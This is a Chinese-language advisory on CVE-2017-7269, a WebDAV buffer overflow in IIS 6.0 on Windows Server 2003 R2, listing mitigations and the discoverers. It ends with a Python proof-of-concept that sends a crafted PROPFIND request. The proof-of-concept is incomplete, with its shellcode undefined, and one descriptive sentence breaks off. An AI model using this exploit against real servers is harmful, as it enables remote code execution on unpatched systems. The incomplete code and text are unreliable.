IIS 6.0曝远程代码执行漏洞CVE-2017-7269。
;漏洞描述
微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If。
由于开启WebDAV服务就存在该漏洞,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。
漏洞编号
CVE-2017-7269
其他信息
ScStoragePathFromUrl函数被调用两次
影响版本
Windows Server 2003 R2
攻击向量
修改过的PROFIND数据
建议处理方式:
1.关闭IIS的Webdav
2.升级IIS或者更换apache解析php
漏洞发现者
Zhiniang Peng和Chen Wu(华南理工大学计算机科学与工程学院信息安全实验室)
PoC
#————Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#———–Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((‘127.0.0.1′,80))
pay=’PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n’
pay+=shellcode
pay+=’>\r\n\r\n’
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close
